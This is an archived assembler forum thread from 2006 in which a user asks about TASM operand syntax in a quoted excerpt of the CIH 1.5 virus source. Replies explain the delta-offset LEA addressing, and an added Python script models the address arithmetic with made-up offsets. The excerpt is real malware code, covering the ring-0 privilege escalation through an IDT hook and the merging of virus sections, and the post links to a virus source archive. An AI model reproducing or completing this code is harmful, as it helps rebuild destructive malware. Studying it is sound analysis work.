flat assembler
Message board for the users of flat assembler.

Tasm syntax confusion -- help needed

Pinczakko
Joined: 02 May 2004
Posts: 34
Location: Takabonerate National Park, Indonesia
The CIH version 1.5 that I'm currently studying uses some confusing Tasm syntax. It's shown below:
Code:
...
; *************************************
; * Let's Modify Structured Exception *
; * Handing, Prevent Exception Error  *
; * Occurrence, Especially in NT.     *
; *************************************
 
                        lea     eax, [esp-04h*2]
                        xor     ebx, ebx
                        xchg    eax, fs:[ebx]
                        call    @0
@0:
                        pop     ebx
                        lea     ecx, StopToRunVirusCode-@0[ebx]; <-- what this means?
                        push    ecx
                        push    eax
 
; *************************************
; * Let's Modify                      *
; * IDT(Interrupt Descriptor Table)   *
; * to Get Ring0 Privilege...         *
; *************************************
 
                        push    eax             ;
                        sidt    [esp-02h]       ; Get IDT Base Address
                        pop     ebx             ;
                        add     ebx, HookExceptionNumber*08h+04h ; ZF = 0
                        cli
                        mov     ebp, [ebx]      ; Get Exception Base
                        mov     bp, [ebx-04h]   ; Entry Point
                        lea     esi, MyExceptionHook-@1[ecx] ; <-- what this means?
                        push    esi
                        mov     [ebx-04h], si           ;
                        shr     esi, 16                 ; Modify Exception
                        mov     [ebx+02h], si           ; Entry Point Address
                        pop     esi
 
; *************************************
; * Generate Exception to Get Ring0   *
; *************************************
 
                        int     HookExceptionNumber     ; GenerateException
ReturnAddressOfEndException     =       $
 
; *************************************
; * Merge All Virus Code Section      *
; *************************************
 
                        push    esi
                        mov     esi, eax
 
LoopOfMergeAllVirusCodeSection:
 
                        mov     ecx, [eax-04h]
                        rep     movsb
                        sub     eax, 08h
                        mov     esi, [eax]
                        or      esi, esi
                        jz      QuitLoopOfMergeAllVirusCodeSection ; ZF = 1
                        jmp     LoopOfMergeAllVirusCodeSection
 
QuitLoopOfMergeAllVirusCodeSection:
 
                        pop     esi
 
; *************************************
; * Generate Exception Again          *
; *************************************
 
                        int     HookExceptionNumber     ; GenerateException Again
 
; *************************************
; * Let's Restore                     *
; * Structured Exception Handing      *
; *************************************
 
ReadyRestoreSE:
                        sti
                        xor     ebx, ebx
                        jmp     RestoreSE
 
; *************************************
; * When Exception Error Occurs,      *
; * Our OS System should be in NT.    *
; * So My Cute Virus will not         *
; * Continue to Run, it Jmups to      *
; * Original Application to Run.      *
; *************************************
 
StopToRunVirusCode:
@1                      =       StopToRunVirusCode
 
                        xor     ebx, ebx
                        mov     eax, fs:[ebx]
                        mov     esp, [eax]
 
RestoreSE:
                        pop     dword ptr fs:[ebx]
                        pop     eax
 
; *************************************
; * Return Original App to Execute    *
; *************************************
 
                        pop     ebp
                        push    00401000h       ; Push Original
OriginalAddressOfEntryPoint     =       $-4     ; App Entry Point to Stack
                         ret     ; Return to Original App Entry Point
...

The lines that I highlighted with "what this means?" are the confusing parts.
What does
Code:
...
@0:
                        pop     ebx
                        lea     ecx, StopToRunVirusCode-@0[ebx]
...
StopToRunVirusCode:
...

mean?

Does it calculate the RVA of StopToRunVirusCode, or does it calculate the
relative address/distance of StopToRunVirusCode from the @0 label?
And what is the ebx register used for?

Does
Code:
StopToRunVirusCode-@0[ebx]

mean:
Code:
StopToRunVirusCode - @0 + value_in_memory_pointed_to_by_ebx

?

I've never used Tasm in Win32 asm programming. Sorry if this kind of question is n00b level.

Anyway, the full source code is at: http://vx.netlux.org/src_view.php?file=cih15.zip

Maybe, viewing the overall code will help to understand the code.

TIA,
Pinczakko

-----------
PS: I'm not trying to revive/recode this virus. Just trying to figure out how its code works. It won't attack Win NT/2K/XP systems either. It has no support for them other than exiting the virus execution upon encountering those systems.

_________________
Human knowledge belongs to the world
Post 20 Oct 2006, 07:08
MazeGen
Joined: 06 Oct 2003
Posts: 975
Location: Czechoslovakia
Hi Pinczakko,
Pinczakko wrote:

Code:
StopToRunVirusCode-@0[ebx]

means:
Code:
StopToRunVirusCode - @0 + value_in_memory_pointed_to_by_ebx

Don't forget the operand is used within LEA instruction:
Code:
...
@0:
                        pop     ebx
                        lea     ecx, StopToRunVirusCode-@0[ebx]
...
StopToRunVirusCode:
...

so it means:
Code:
StopToRunVirusCode - @0 + ebx

And that is the run-time address of the StopToRunVirusCode label.
Post 20 Oct 2006, 09:14
vid
Verbosity in development
Joined: 05 Sep 2003
Posts: 7105
Location: Slovakia
hehe, that "-" is pretty confusing then, because it suggests that "@0[ebx]" is subtracted, while @0 is subtracted and ebx is added.

... love MASM syntax
Post 20 Oct 2006, 11:51
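To make MazeGen's `StopToRunVirusCode - @0 + ebx` reading and vid's point about the misleading `-` concrete, here is an added Python example (not from the thread, not from TASM or any assembler) that splits a TASM `expr[reg]` operand into its assembly-time displacement and run-time base register, then replays the two LEAs from the snippet. The label offsets in `SYMBOLS` and the run-time value passed as `ebx` are constructed placeholders, not the real CIH layout.

```python
import re

# Constructed assembly-time offsets for the labels in the snippet (made-up values).
SYMBOLS = {
    "@0": 0x1000,
    "StopToRunVirusCode": 0x1080,
    "@1": 0x1080,            # the source defines @1 = StopToRunVirusCode
    "MyExceptionHook": 0x10C0,
}

# 'expr' optionally followed by '[reg]'; only + and - terms are handled.
OPERAND_RE = re.compile(r"^\s*(?P<disp>[^\[\]]+?)\s*(?:\[(?P<base>[a-z]+)\])?\s*$")
TERM_RE = re.compile(r"([+-]?)\s*([@\w]+)")


def _value(token, symbols):
    """A term is a known label or a TASM number ('08h' is hex, '16' is decimal)."""
    if token in symbols:
        return symbols[token]
    if token[-1].lower() == "h":
        return int(token[:-1], 16)
    return int(token, 10)


def parse_tasm_operand(text, symbols):
    """Split 'expr[reg]' into (displacement, base register).

    Everything left of the bracket is an assembly-time constant, so the '-'
    applies to @0 only; the bracketed register is a run-time addend.
    """
    m = OPERAND_RE.match(text)
    if not m:
        raise ValueError(f"unsupported operand: {text!r}")
    disp = 0
    for sign, token in TERM_RE.findall(m.group("disp")):
        disp += -_value(token, symbols) if sign == "-" else _value(token, symbols)
    return disp, m.group("base")


def lea(text, symbols, regs):
    """What LEA loads: displacement + base, as a 32-bit value, with no memory read."""
    disp, base = parse_tasm_operand(text, symbols)
    return (disp + (regs[base] if base else 0)) & 0xFFFFFFFF


def resolve_snippet(runtime_at0, symbols=SYMBOLS):
    """Replay both LEAs; ebx holds the run-time address of @0 (the call/pop result)."""
    regs = {"ebx": runtime_at0}
    regs["ecx"] = lea("StopToRunVirusCode-@0[ebx]", symbols, regs)  # run-time StopToRunVirusCode
    regs["esi"] = lea("MyExceptionHook-@1[ecx]", symbols, regs)     # run-time MyExceptionHook
    return regs["ecx"], regs["esi"]
```

Because `@1 = StopToRunVirusCode` and ecx already holds its run-time address, the second LEA relocates MyExceptionHook the same way; swapping in the real offsets from the full listing gives the real addresses.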
Pinczakko
Joined: 02 May 2004
Posts: 34
Location: Takabonerate National Park, Indonesia
Thx guys. Really helpful for me.

_________________
Human knowledge belongs to the world
Post 21 Oct 2006, 05:30
Copyright © 1999-2020, Tomasz Grysztar. Also on YouTube, Twitter.